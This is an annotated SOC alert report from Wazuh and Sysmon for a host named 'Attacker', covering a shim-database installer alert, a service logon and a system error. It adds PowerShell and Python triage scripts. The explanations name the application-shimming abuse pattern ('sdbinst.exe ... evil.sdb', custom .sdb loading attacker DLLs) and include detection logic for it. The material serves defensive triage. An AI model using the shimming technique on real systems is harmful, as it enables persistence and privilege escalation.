When the endpoint wrote the event (UTC). Use this, not the alert's timestamp, for the endpoint timeline; the ~11 s gap to timestamp (22:50:11) is agent‑to‑manager ingestion delay.

data.win.system.eventRecordID:  2429
Incremental log record number – handy for timeline order.

data.win.system.processID:  11200
PID of the process that logged the event on the endpoint (for a service event, usually the svchost.exe hosting that service).

data.win.system.threadID:  0
Thread ID of the logging thread; rarely useful outside deep forensics.

data.win.system.channel:  Application
Event log channel the event was written to. Tells you which log to export from the host if you need the raw .evtx.

data.win.system.computer:  Attacker
Hostname the endpoint recorded in the event itself. It should match agent.name; a mismatch points to forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:49:00Z. Reason: RulesEngine."
Rendered event text. SPP scheduling its own restart roughly 24 h ahead with Reason: RulesEngine is routine licensing housekeeping on a Windows client. Wazuh rated it level 3 (informational); the Medium label on this alert comes from the local scoring script, not from the event's content, so treat it as noise unless it clusters with something else on the host.

data.win.eventdata.data:  2025-04-25T22:49:00Z, RulesEngine
The event's raw parameter list: the values substituted into the message template (restart time and reason).

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Application Compatibility Database launched

🧠 What happened? Application Compatibility Database launched

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:50:28.818+0000 | 🧠 MITRE: ['Privilege Escalation', 'Persistence'] – ['Application Shimming'] [T1546.011]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1546.011 – Application Shimming. sdbinst.exe installs application‑compatibility (shim) databases; a custom .sdb can make a target executable load attacker‑controlled DLLs or change its behaviour, which is why any execution of it is flagged. Before escalating, check three things in the event data: (1) is the image the signed System32 sdbinst.exe with the expected hash, (2) does the command line name a .sdb file path, and (3) who is the parent. Here the parent is svchost.exe hosting PcaSvc (Program Compatibility Assistant) running as SYSTEM and the command line is 'sdbinst.exe -m -bg' with no database path, which is the pattern Windows itself produces; abuse usually shows sdbinst.exe launched from a user, script or Office context with a path to a .sdb file. Close the loop by listing the shim databases installed on the host (C:\Windows\AppPatch\Custom and HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB) and checking for anything you did not deploy.

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:28.818+0000
When the Wazuh manager generated the alert, not when the endpoint wrote the event; for the endpoint‑side time use data.win.system.systemTime and data.win.eventdata.utcTime below.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Application Compatibility Database launched
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92058
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1546.011']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Privilege Escalation', 'Persistence']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Application Shimming']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535028.2651913
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider: Sysmon (Sysinternals System Monitor). Its event IDs use Sysmon's own numbering (1 = Process Create), not Windows Security IDs.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon's fixed provider GUID; the same on every host, so it is a reliable filter key.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
Event template version (Sysmon bumps it when it adds fields to an event ID).

data.win.system.level:  4
Windows log level (4 = Information). All Sysmon events are informational; the severity comes from the Wazuh rule, not from this field.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:50:26.9576523Z
When Sysmon wrote the event (UTC). Use this for the endpoint timeline; it is ~2 s before the alert timestamp (ingestion delay) and a few ms after eventdata.utcTime, the process‑creation instant itself.

data.win.system.eventRecordID:  345991
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service process that logged the event, not of the created process (that is eventdata.processId).

data.win.system.threadID:  4740
Logging thread inside the Sysmon service; rarely useful.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel. Pull this log from the host to see the surrounding Sysmon events (for example EID 11 file creates and EID 13 registry value sets) around the same utcTime.

data.win.system.computer:  Attacker
Hostname recorded in the event; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:50:26.949 ProcessGuid: {94294ddc-c032-680a-c10c-000000000e00} ProcessId: 12176 Image: C:\Windows\System32\sdbinst.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Application Compatibility Database Installer Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: sdbinst.exe CommandLine: C:\WINDOWS\System32\sdbinst.exe -m -bg CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=D4646168E6E81A16CA2EB703CFE133DED7C3FD8626696AA3CB2A4425E0E54F1D ParentProcessGuid: {94294ddc-ea9e-67fe-9c00-000000000e00} ParentProcessId: 5424 ParentImage: C:\Windows\System32\svchost.exe ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc ParentUser: NT AUTHORITY\SYSTEM"
The full Sysmon Process Create record as rendered text; every field is also broken out under data.win.eventdata below. Read it as a chain: ParentImage/ParentCommandLine → Image/CommandLine, under User and IntegrityLevel. Here a SYSTEM‑level svchost.exe hosting PcaSvc spawned System32\sdbinst.exe -m -bg.

data.win.eventdata.utcTime:  2025-04-24 22:50:26.949
Exact process‑creation time from Sysmon (UTC, millisecond precision). The anchor for ordering against other Sysmon events on the host.

data.win.eventdata.processGuid:  {94294ddc-c032-680a-c10c-000000000e00}
Sysmon's globally unique ID for this process instance (PIDs get reused, GUIDs do not). Pivot on it to find every Sysmon event this process generated (network, file, registry).

data.win.eventdata.processId:  12176
PID of the new process on the endpoint. Only meaningful together with utcTime, since PIDs are recycled.

data.win.eventdata.image:  C:\\Windows\\System32\\sdbinst.exe
Full path of the executable. Verify it really is the System32 binary; the same file name in a user‑writable directory would be the red flag.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
Version resource of the binary (10.0.26100 is the Windows 11 24H2 build line). Useful to confirm the file is the stock OS build.

data.win.eventdata.description:  Application Compatibility Database Installer
File description from the PE version resource. Renamed tools usually keep their original description, so compare it with image and originalFileName.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the version resource.

data.win.eventdata.company:  Microsoft Corporation
Company string from the version resource. Metadata only, not proof of signing; check the Authenticode signature on the file if you need that.

data.win.eventdata.originalFileName:  sdbinst.exe
The file name compiled into the binary. A mismatch with the image file name (originalFileName sdbinst.exe running as update.exe, say) is a classic masquerading indicator.

data.win.eventdata.commandLine:  C:\\WINDOWS\\System32\\sdbinst.exe -m -bg
Full command line. For shim abuse you would expect a path to a .sdb file here (sdbinst.exe <file>.sdb, optionally -q for quiet); '-m -bg' with no database path is what the Program Compatibility Assistant service runs on its own.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
Working directory of the new process. System32 for a service‑spawned OS binary is expected; a user profile, Temp or Downloads path for an OS binary is not.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the process runs as. SYSTEM is consistent with a service parent; a human account running sdbinst.exe would deserve a closer look.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon GUID of the logon session; ties this process to the logon (4624) that created the session.

data.win.eventdata.logonId:  0x3e7
Logon session ID. 0x3E7 (999) is the well‑known ID of the SYSTEM account's session, present since boot.

data.win.eventdata.terminalSessionId:  0
Windows session number. Session 0 is the non‑interactive services session; interactive desktops are session 1 and up.

data.win.eventdata.integrityLevel:  System
Process integrity level (Low / Medium / High / System). System matches the SYSTEM account and the service parent.

data.win.eventdata.hashes:  SHA256=D4646168E6E81A16CA2EB703CFE133DED7C3FD8626696AA3CB2A4425E0E54F1D
Hash(es) of the image file, as configured in the Sysmon config (SHA256 here). Compare with Get-FileHash on the host, or look it up in your reputation source, to confirm the file is the stock Microsoft binary and has not changed since the event.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea9e-67fe-9c00-000000000e00}
Sysmon GUID of the parent process; pivot on it to find the parent's own EID 1 and everything else it spawned.

data.win.eventdata.parentProcessId:  5424
PID of the parent on the endpoint.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\svchost.exe
Parent executable. The parent/child pair is the most useful single signal in an EID 1: svchost.exe → sdbinst.exe is the OS's own pattern; cmd.exe, powershell.exe, an Office application or an unsigned binary → sdbinst.exe would be the suspicious one.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
Parent's command line. '-s PcaSvc' identifies the service hosted by this svchost instance: the Program Compatibility Assistant service, which installs and maintains shim databases as part of its normal job.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
Account the parent runs as; matches the child, as expected for a service‑spawned process.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  12
Score our script assigns, documented as 0‑10 (0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority). This record shows 12, above the documented ceiling and equal to rule.level, so the 0‑10 bands are not reliable for high‑level rules; treat anything ≥ 8 as priority and check the scoring script if you depend on the scale.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
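Triage for the sdbinst.exe alert above can be done from an elevated PowerShell on the host. The following is an added example and not part of the SOCscribe report or of Sysmon: the hash, image, command line and parent values are pasted in from the alert's event data, the file paths and registry keys are the locations Windows uses for installed shim databases, and the variable names are this example's own.

```powershell
# Added triage example for Sysmon EID 1 'sdbinst.exe' (T1546.011).
# Values below are copied from the alert's eventdata.
$alertHash   = 'D4646168E6E81A16CA2EB703CFE133DED7C3FD8626696AA3CB2A4425E0E54F1D'
$alertImage  = 'C:\Windows\System32\sdbinst.exe'
$alertCmd    = 'C:\WINDOWS\System32\sdbinst.exe -m -bg'
$alertParent = 'C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc'

# 1. Is the file that ran the genuine, Microsoft-signed sdbinst.exe, and is it
#    still the same file Sysmon hashed at process start?
$sig  = Get-AuthenticodeSignature -FilePath $alertImage
$hash = (Get-FileHash -Path $alertImage -Algorithm SHA256).Hash
[pscustomobject]@{
    Image            = $alertImage
    SignatureStatus  = $sig.Status             # expect 'Valid'
    Signer           = $sig.SignerCertificate.Subject
    HashMatchesAlert = ($hash -eq $alertHash)  # False = the file changed since the event
} | Format-List

# 2. Did the command line install a database? Abuse looks like
#    'sdbinst.exe [-q] C:\path\evil.sdb'; the PCA service's own call carries no path.
$sdbOnCmdLine   = $alertCmd -match '\.sdb(\s|$)'    # False for this alert
$parentIsPcaSvc = $alertParent -match '-s PcaSvc'   # True for this alert
"Custom .sdb on command line: $sdbOnCmdLine; parent is the PCA service: $parentIsPcaSvc"

# 3. Regardless of 1 and 2, inventory the shim databases installed right now.
#    sdbinst copies custom databases to AppPatch\Custom (and \Custom64) and
#    registers them under AppCompatFlags\InstalledSDB; AppCompatFlags\Custom
#    holds one subkey per executable that a custom shim applies to.
$appCompat = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags'
$sdbDirs   = "$env:SystemRoot\AppPatch\Custom", "$env:SystemRoot\AppPatch\Custom\Custom64"

$sdbFiles = @(Get-ChildItem -Path $sdbDirs -Filter *.sdb -ErrorAction SilentlyContinue |
              Select-Object FullName, Length, LastWriteTimeUtc)

$installed = @(Get-ChildItem -Path "$appCompat\InstalledSDB" -ErrorAction SilentlyContinue | ForEach-Object {
    $p = Get-ItemProperty -Path $_.PSPath
    [pscustomobject]@{
        Guid        = $_.PSChildName
        Path        = $p.DatabasePath
        Description = $p.DatabaseDescription
        Installed   = [DateTime]::FromFileTimeUtc([long]$p.DatabaseInstallTimeStamp)
    }
})

$shimmed = @(Get-ChildItem -Path "$appCompat\Custom" -ErrorAction SilentlyContinue |
             Select-Object -ExpandProperty PSChildName)

"Custom .sdb files: $($sdbFiles.Count)";           $sdbFiles  | Format-Table -AutoSize
"Registered databases: $($installed.Count)";      $installed | Format-Table -AutoSize
"Executables with a custom shim: $($shimmed.Count)"; $shimmed

# Anything in step 3 that you did not deploy yourself is the finding. An empty
# inventory plus a valid signature and a PcaSvc parent is the benign case.
```

If step 3 turns up a database, pull its DatabasePath and the Sysmon EID 11 (file create) and EID 13 (registry value set) events around the same utcTime to see which process dropped and registered it; that process, not sdbinst.exe, is the one to chase.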

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:54:52.661+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts. A successful logon (4624) is tagged with T1078 because stolen or shared credentials look identical to legitimate use; on its own the event is level 3 (informational) and fires constantly (firedtimes 67 here). Triage on the 4624 event data rather than the header: the logon type (2 interactive, 3 network, 5 service, 7 unlock, 10 RemoteInteractive/RDP), the target account and domain, the source workstation and IP address, the logon process and authentication package (NTLM versus Kerberos), and whether the token was elevated. Escalate when the account, source or logon type is unusual for this host, or when the success follows a burst of 4625 failures.

🔍 Full Alert Details
timestamp:  2025-04-24T22:54:52.661+0000
When the Wazuh manager generated the alert, not when the endpoint wrote the event; for the endpoint‑side time use data.win.system.systemTime below.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  67
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
UK Good Practice Guide 13 (protective monitoring) control mapping.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535292.2657390
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Security-Auditing is the provider behind every Security-log audit event (4624, 4625, 4672, 4688 …).

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
GUID of that provider – stable across Windows versions, so a safer filter key than the display name.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
Schema version of the event. Later versions add fields; this one carries Restricted Admin Mode, Virtual Account, Elevated Token and Linked Logon ID, which older parsers do not know.

data.win.system.level:  0
ETW level. Security-log audit events are always level 0 (Log Always); success vs. failure is carried in the keywords, not here.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.). 12544 = Logon.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows. 0x8020000000000000 = Audit Success; 0x8010000000000000 = Audit Failure. Good for filtering.

data.win.system.systemTime:  2025-04-24T22:54:09.8291801Z
When the endpoint itself wrote the event (UTC, endpoint clock). Compare with the Wazuh timestamp above – here about 43 s later – to spot ingestion lag or clock skew.

data.win.system.eventRecordID:  43993
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
PID of the process that logged the event. For Security-Auditing events this is lsass.exe, not the process that performed the logon (that one is in eventdata.processId below).

data.win.system.threadID:  9532
Thread inside that logging process. Rarely useful outside deep forensics.

data.win.system.channel:  Security
Event log channel. Security only records what audit policy enables, so a missing 4624 can mean policy, not absence of logons.

data.win.system.computer:  Attacker
Hostname the event was recorded on. Should match agent.name; a mismatch suggests forwarded events or a renamed host.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity. For the Security channel this is AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR.

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Fully rendered message; the eventdata.* fields below are its parsed form. Read it once for the story: the Service Control Manager (services.exe, Subject = the machine account ATTACKER$ acting as SYSTEM, Logon ID 0x3E7) started a service, which created a new logon session for SYSTEM with Logon Type 5. Both logon IDs being 0x3E7 (decimal 999, the fixed SYSTEM session) and empty network fields make this routine background noise on any Windows host; the T1078 tag is generic to every 4624, not evidence of credential abuse.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon. S-1-5-18 is Local System.

data.win.eventdata.subjectUserName:  ATTACKER$
Requesting account name. The trailing $ marks a computer account – the host itself, not a human.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requesting account. WORKGROUP means the host is not domain-joined, so there is no DC-side 4768/4769 to correlate with.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session of the requester. 0x3e7 (999) is the fixed SYSTEM session present after every Windows boot.

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account that was logged on (the session being created). Again Local System.

data.win.eventdata.targetUserName:  SYSTEM
Name of the logged-on account.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Domain of the logged-on account. NT AUTHORITY is the built-in pseudo-domain for SYSTEM, LOCAL SERVICE and NETWORK SERVICE.

data.win.eventdata.targetLogonId:  0x3e7
Logon ID of the new session. Pivot key: every later 4672/4688/4634 carrying the same Logon ID belongs to this session.

data.win.eventdata.logonType:  5
How the logon happened. 5 = Service (started by the Service Control Manager). Others worth knowing: 2 Interactive, 3 Network, 4 Batch, 7 Unlock, 8 NetworkCleartext, 9 NewCredentials (runas /netonly), 10 RemoteInteractive (RDP), 11 CachedInteractive.

data.win.eventdata.logonProcessName:  Advapi
Trusted logon process. Advapi = the LogonUser API path used by services, scheduled tasks and IIS; User32 = console logon; NtLmSsp/Kerberos = network logons.

data.win.eventdata.authenticationPackageName:  Negotiate
SSPI package that authenticated the account. Negotiate selects Kerberos or NTLM; for a local SYSTEM logon nothing actually crosses the network.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
Kerberos logon GUID used to match this event with a 4769 on the DC. All zeros = no Kerberos ticket involved, expected for a service logon on a workgroup host.

data.win.eventdata.keyLength:  0
Length in bits of the session key negotiated for this logon (e.g. 128). 0 means no session key was requested, which is normal for local, service and Kerberos logons; it is not a weak-crypto downgrade. The value only matters for NTLM network logons, where 56 or 40 instead of 128 points at a legacy client.

data.win.eventdata.processId:  0x304
PID (hex) of the process that requested the logon: 0x304 = 772.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Image of that process. services.exe is the Service Control Manager, consistent with Logon Type 5.

data.win.eventdata.impersonationLevel:  %%1833
Windows message-table code. %%1833 = Impersonation (the session can impersonate the user locally); %%1832 = Identification, %%1840 = Delegation.

data.win.eventdata.virtualAccount:  %%1843
%%1843 = No (not a per-service virtual account); %%1842 would be Yes.

data.win.eventdata.targetLinkedLogonId:  0x0
Logon ID of the UAC-linked (filtered) session. 0x0 = no split token, expected for SYSTEM.

data.win.eventdata.elevatedToken:  %%1842
%%1842 = Yes: the new session holds a full administrative token. Unremarkable for SYSTEM; notable for an ordinary user on an interactive logon.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.
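Added example (Python, not SOCscribe or Wazuh code): a triage pass over the flattened 4624 fields above, separating the routine Service Control Manager logon from the logon shapes that deserve a look. SCM_LOGON is constructed from this alert's values; RDP_LOGON is a constructed counter-example. The ipAddress key (the Source Network Address field, which this alert's output does not show), the "internal" address ranges and the noise/review/escalate thresholds are assumptions of the example.

```python
"""Triage helper for Windows 4624 events as flattened by Wazuh (data.win.eventdata.*).

Added example, not SOCscribe/Wazuh code. SCM_LOGON is built from the alert above;
RDP_LOGON is a constructed counter-example. The 'ipAddress' key name and the
noise/review/escalate thresholds are this example's assumptions.
"""
import ipaddress

# Logon Type codes from the 4624 schema.
LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
               8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
               11: "CachedInteractive"}
# Built-in service identities the Service Control Manager logs on at boot.
SERVICE_SIDS = {"S-1-5-18": "SYSTEM", "S-1-5-19": "LOCAL SERVICE", "S-1-5-20": "NETWORK SERVICE"}
# RFC 1918 plus loopback/link-local; anything else is treated as external here (assumption).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "::1/128", "fe80::/10")]
RANK = {"noise": 0, "review": 1, "escalate": 2}


def source_is_internal(addr):
    """True/False for a parseable address; None for '-' (4624 uses '-' when there is no source)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    return any(ip in net for net in INTERNAL_NETS)


def triage_4624(ev):
    """Return {'tier', 'logon_type', 'reasons'} for one flattened 4624 event dict."""
    logon_type = int(ev.get("logonType", 0))
    type_name = LOGON_TYPES.get(logon_type, f"type {logon_type}")
    target_sid = ev.get("targetUserSid", "")
    # Wazuh output doubles backslashes; normalise so the suffix test works on both forms.
    proc = ev.get("processName", "").replace("\\\\", "\\").lower()
    src = ev.get("ipAddress", "-")
    findings = []

    if logon_type == 5 and target_sid in SERVICE_SIDS and proc.endswith("\\services.exe"):
        findings.append(("noise", f"{SERVICE_SIDS[target_sid]} service logon by the Service Control Manager"))
    elif logon_type == 5:
        findings.append(("review", f"service logon for non-built-in account {ev.get('targetUserName')}"))
    if logon_type == 9:
        findings.append(("review", "NewCredentials logon (runas /netonly pattern); inspect the process"))
    if logon_type == 8:
        findings.append(("escalate", "NetworkCleartext logon: the password crossed the wire in clear"))
    if logon_type in (3, 10):
        internal = source_is_internal(src)
        if internal is False:
            findings.append(("escalate", f"{type_name} logon from {src}, outside RFC 1918/loopback"))
        elif internal is None:
            findings.append(("review", f"{type_name} logon without a usable source address ({src!r})"))
    if ev.get("elevatedToken") == "%%1842" and logon_type in (2, 10, 11):  # %%1842 = Yes
        findings.append(("review", "interactive logon holding an elevated (full admin) token"))

    if not findings:
        findings.append(("noise", "no notable attributes"))
    tier = max((sev for sev, _ in findings), key=RANK.get)
    return {"tier": tier, "logon_type": type_name, "reasons": [text for _, text in findings]}


# Constructed from the 4624 alert above: SYSTEM logged on by services.exe, Logon Type 5.
SCM_LOGON = {
    "subjectUserSid": "S-1-5-18", "subjectUserName": "ATTACKER$", "subjectLogonId": "0x3e7",
    "targetUserSid": "S-1-5-18", "targetUserName": "SYSTEM", "targetLogonId": "0x3e7",
    "logonType": "5", "logonProcessName": "Advapi", "authenticationPackageName": "Negotiate",
    "processId": "0x304", "processName": "C:\\Windows\\System32\\services.exe",
    "elevatedToken": "%%1842", "ipAddress": "-",
}
# Constructed counter-example (hypothetical SID; 203.0.113.0/24 is the RFC 5737 documentation range).
RDP_LOGON = {
    "targetUserSid": "S-1-5-21-1111-2222-3333-1001", "targetUserName": "Attcker1",
    "logonType": "10", "logonProcessName": "User32", "authenticationPackageName": "Negotiate",
    "processName": "C:\\Windows\\System32\\svchost.exe",
    "elevatedToken": "%%1842", "ipAddress": "203.0.113.7",
}

if __name__ == "__main__":
    for ev in (SCM_LOGON, RDP_LOGON):
        print(triage_4624(ev))
```

The alert above lands in the noise tier on the first rule (type 5, built-in SID, services.exe), which is the only combination that should be suppressed; a type 5 logon for a non-built-in account still gets a review because services running as named users are where stolen credentials tend to persist.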

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:54:54.290+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:54:54.290+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
UK GPG 13 (Good Practice Guide 13, Protective Monitoring) control mapping – a compliance tag, not a detection signal.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535294.2664727
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

